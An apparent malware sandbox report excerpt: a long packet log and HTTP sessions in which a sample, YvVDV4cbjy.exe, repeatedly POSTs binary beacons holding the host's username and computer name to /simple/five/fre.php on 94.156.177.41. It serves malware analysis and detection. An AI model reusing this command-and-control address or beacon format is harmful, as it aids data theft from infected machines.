Jan 11, 2025 07:46:06.345874071 CET	50090	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:06.348757982 CET	50090	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:06.353539944 CET	80	50090	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:06.353602886 CET	50090	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:06.358464003 CET	80	50090	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:07.103013039 CET	80	50090	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:07.103104115 CET	80	50090	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:07.103223085 CET	50090	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:07.103280067 CET	50090	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:07.108112097 CET	80	50090	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:07.242539883 CET	50091	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:07.247459888 CET	80	50091	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:07.247535944 CET	50091	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:07.250516891 CET	50091	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:07.255374908 CET	80	50091	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:07.255436897 CET	50091	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:07.260277987 CET	80	50091	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:07.967211008 CET	80	50091	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:07.967298985 CET	80	50091	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:07.967380047 CET	50091	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:07.969109058 CET	50091	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:07.974126101 CET	80	50091	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:08.125329971 CET	50092	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:08.130305052 CET	80	50092	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:08.130470991 CET	50092	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:08.133380890 CET	50092	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:08.138242960 CET	80	50092	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:08.138322115 CET	50092	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:08.143289089 CET	80	50092	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:08.856152058 CET	80	50092	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:08.856239080 CET	80	50092	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:08.856364965 CET	50092	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:08.856364965 CET	50092	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:08.861511946 CET	80	50092	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:09.017049074 CET	50093	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:09.024060965 CET	80	50093	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:09.024182081 CET	50093	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:09.026247025 CET	50093	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:09.033284903 CET	80	50093	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:09.033339024 CET	50093	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:09.040050030 CET	80	50093	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:09.755974054 CET	80	50093	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:09.756000042 CET	80	50093	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:09.756222010 CET	50093	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:09.756222010 CET	50093	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:09.761086941 CET	80	50093	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:09.897703886 CET	50094	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:09.902683973 CET	80	50094	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:09.902792931 CET	50094	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:09.905754089 CET	50094	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:09.910531044 CET	80	50094	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:09.910608053 CET	50094	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:09.915446043 CET	80	50094	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:10.621844053 CET	80	50094	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:10.621882915 CET	80	50094	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:10.621993065 CET	50094	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:10.623661041 CET	50094	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:10.628603935 CET	80	50094	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:10.785003901 CET	50095	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:10.790160894 CET	80	50095	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:10.790271044 CET	50095	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:10.792256117 CET	50095	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:10.797972918 CET	80	50095	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:10.798043966 CET	50095	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:10.803627968 CET	80	50095	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:11.520802021 CET	80	50095	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:11.520869017 CET	80	50095	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:11.520962954 CET	50095	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:11.521015882 CET	50095	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:11.525940895 CET	80	50095	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:11.678774118 CET	50096	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:11.683864117 CET	80	50096	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:11.683960915 CET	50096	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:11.685985088 CET	50096	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:11.690910101 CET	80	50096	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:11.690984964 CET	50096	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:11.695800066 CET	80	50096	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:12.414182901 CET	80	50096	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:12.414223909 CET	80	50096	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:12.414303064 CET	50096	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:12.414346933 CET	50096	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:12.419182062 CET	80	50096	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:12.551348925 CET	50097	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:12.556387901 CET	80	50097	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:12.556456089 CET	50097	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:12.558747053 CET	50097	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:12.563587904 CET	80	50097	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:12.563647032 CET	50097	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:12.568600893 CET	80	50097	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:13.286118984 CET	80	50097	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:13.286164045 CET	80	50097	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:13.286242008 CET	50097	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:13.287667990 CET	50097	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:13.292706966 CET	80	50097	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:13.425811052 CET	50098	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:13.430789948 CET	80	50098	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:13.430890083 CET	50098	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:13.432965040 CET	50098	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:13.437767982 CET	80	50098	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:13.437851906 CET	50098	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:13.442780972 CET	80	50098	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:14.163225889 CET	80	50098	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:14.163284063 CET	80	50098	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:14.163374901 CET	50098	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:14.165795088 CET	50098	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:14.170613050 CET	80	50098	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:14.297678947 CET	50099	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:14.302766085 CET	80	50099	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:14.302880049 CET	50099	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:14.305083990 CET	50099	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:14.310038090 CET	80	50099	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:14.311717033 CET	50099	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:14.316606998 CET	80	50099	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:15.039928913 CET	80	50099	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:15.039987087 CET	80	50099	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:15.040083885 CET	50099	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:15.040155888 CET	50099	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:15.044891119 CET	80	50099	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:15.184257984 CET	50100	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:15.189363956 CET	80	50100	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:15.189460039 CET	50100	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:15.191468000 CET	50100	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:15.196350098 CET	80	50100	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:15.196450949 CET	50100	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:15.201316118 CET	80	50100	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:15.899775028 CET	80	50100	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:15.899909019 CET	80	50100	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:15.899908066 CET	50100	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:15.899960995 CET	50100	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:15.904778004 CET	80	50100	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:16.054841995 CET	50101	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:16.059674978 CET	80	50101	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:16.059812069 CET	50101	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:16.062007904 CET	50101	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:16.066858053 CET	80	50101	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:16.066977024 CET	50101	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:16.071876049 CET	80	50101	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:16.788527966 CET	80	50101	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:16.788579941 CET	80	50101	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:16.788671970 CET	50101	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:16.788671970 CET	50101	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:16.796097994 CET	80	50101	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:16.934180021 CET	50102	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:16.939819098 CET	80	50102	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:16.939929008 CET	50102	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:16.941674948 CET	50102	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:16.947079897 CET	80	50102	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:16.947180033 CET	50102	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:16.951956987 CET	80	50102	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:17.639245987 CET	80	50102	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:17.639271975 CET	80	50102	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:17.639410973 CET	50102	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:17.639450073 CET	50102	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:17.644507885 CET	80	50102	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:17.783998013 CET	50103	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:17.788950920 CET	80	50103	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:17.789031029 CET	50103	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:17.791002989 CET	50103	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:17.795767069 CET	80	50103	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:17.795814037 CET	50103	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:17.800664902 CET	80	50103	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:18.635993958 CET	80	50103	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:18.636082888 CET	80	50103	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:18.636149883 CET	50103	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:18.636149883 CET	50103	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:18.641050100 CET	80	50103	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:18.783993006 CET	50104	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:18.788842916 CET	80	50104	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:18.788943052 CET	50104	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:18.791034937 CET	50104	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:18.795792103 CET	80	50104	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:18.795869112 CET	50104	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:18.800628901 CET	80	50104	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:19.502355099 CET	80	50104	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:19.502382994 CET	80	50104	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:19.502501965 CET	50104	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:19.502549887 CET	50104	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:19.507350922 CET	80	50104	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:19.664300919 CET	50105	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:19.669946909 CET	80	50105	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:19.670160055 CET	50105	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:19.672302961 CET	50105	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:19.677970886 CET	80	50105	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:19.678030014 CET	50105	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:19.682795048 CET	80	50105	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:20.387223005 CET	80	50105	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:20.387383938 CET	50105	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:20.387435913 CET	80	50105	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:20.387485027 CET	50105	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:20.392302990 CET	80	50105	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:20.533061028 CET	50106	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:20.538218021 CET	80	50106	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:20.538305044 CET	50106	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:20.540424109 CET	50106	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:20.545344114 CET	80	50106	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:20.545406103 CET	50106	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:20.550228119 CET	80	50106	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:21.299537897 CET	80	50106	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:21.299722910 CET	50106	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:21.301728964 CET	80	50106	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:21.301790953 CET	50106	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:21.304554939 CET	80	50106	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:21.438968897 CET	50107	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:21.443867922 CET	80	50107	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:21.443936110 CET	50107	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:21.445941925 CET	50107	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:21.450747013 CET	80	50107	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:21.450793982 CET	50107	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:21.455559969 CET	80	50107	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:22.344794035 CET	80	50107	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:22.344862938 CET	80	50107	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:22.345031977 CET	50107	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:22.345088959 CET	50107	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:22.349940062 CET	80	50107	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:22.486140013 CET	50108	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:22.491293907 CET	80	50108	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:22.491384983 CET	50108	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:22.493406057 CET	50108	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:22.498229027 CET	80	50108	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:22.498284101 CET	50108	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:22.503060102 CET	80	50108	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:23.228400946 CET	80	50108	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:23.228494883 CET	50108	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:23.228574038 CET	80	50108	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:23.228615999 CET	50108	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:23.233336926 CET	80	50108	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:23.359004021 CET	50109	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:23.364626884 CET	80	50109	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:23.364696980 CET	50109	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:23.366950035 CET	50109	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:23.372528076 CET	80	50109	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:23.372577906 CET	50109	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:23.378117085 CET	80	50109	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:24.078866959 CET	80	50109	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:24.078933001 CET	80	50109	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:24.079216957 CET	50109	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:24.079265118 CET	50109	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:24.084214926 CET	80	50109	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:24.208570004 CET	50110	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:24.213582993 CET	80	50110	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:24.213681936 CET	50110	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:24.215676069 CET	50110	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:24.220513105 CET	80	50110	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:24.220617056 CET	50110	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:24.225471020 CET	80	50110	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:24.943252087 CET	80	50110	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:24.943310976 CET	80	50110	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:24.943362951 CET	50110	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:24.943409920 CET	50110	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:24.948270082 CET	80	50110	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:25.083512068 CET	50111	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:25.088705063 CET	80	50111	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:25.088794947 CET	50111	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:25.090544939 CET	50111	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:25.095357895 CET	80	50111	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:25.095419884 CET	50111	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:25.100285053 CET	80	50111	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:25.811788082 CET	80	50111	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:25.812031031 CET	80	50111	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:25.812030077 CET	50111	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:25.812098026 CET	50111	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:25.816845894 CET	80	50111	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:25.945693016 CET	50112	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:25.950799942 CET	80	50112	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:25.951678991 CET	50112	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:25.953727007 CET	50112	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:25.958596945 CET	80	50112	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:25.958652973 CET	50112	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:25.963481903 CET	80	50112	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:26.689274073 CET	80	50112	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:26.689300060 CET	80	50112	94.156.177.41	192.168.2.5
Jan 11, 2025 07:46:26.689397097 CET	50112	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:26.689398050 CET	50112	80	192.168.2.5	94.156.177.41
Jan 11, 2025 07:46:26.694307089 CET	80	50112	94.156.177.41	192.168.2.5

HTTP Request Dependency Graph

94.156.177.41

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49707	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:25.594582081 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 180 Connection: close
Jan 11, 2025 07:44:25.599550009 CET	180	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: 'ckav.rualfons841618ALFONS-PCk0FDD42EE188E931437F4FBE2CztldF
Jan 11, 2025 07:44:26.317852020 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:26 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49708	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:26.510052919 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 180 Connection: close
Jan 11, 2025 07:44:26.514900923 CET	180	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: 'ckav.rualfons841618ALFONS-PC+0FDD42EE188E931437F4FBE2C9zHFD
Jan 11, 2025 07:44:27.217266083 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:27 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49709	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:27.302273989 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:27.307244062 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:28.030574083 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:27 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49711	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 07:44:28.186079979 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 153 Connection: close
Jan 11, 2025 07:44:28.191010952 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 07:44:28.931834936 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 06:44:28 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49713	94.156.177.41	80	6584	C:\Users\user\Desktop\YvVDV4cbjy.exe

Timestamp	Bytes transferred	Direction	Data
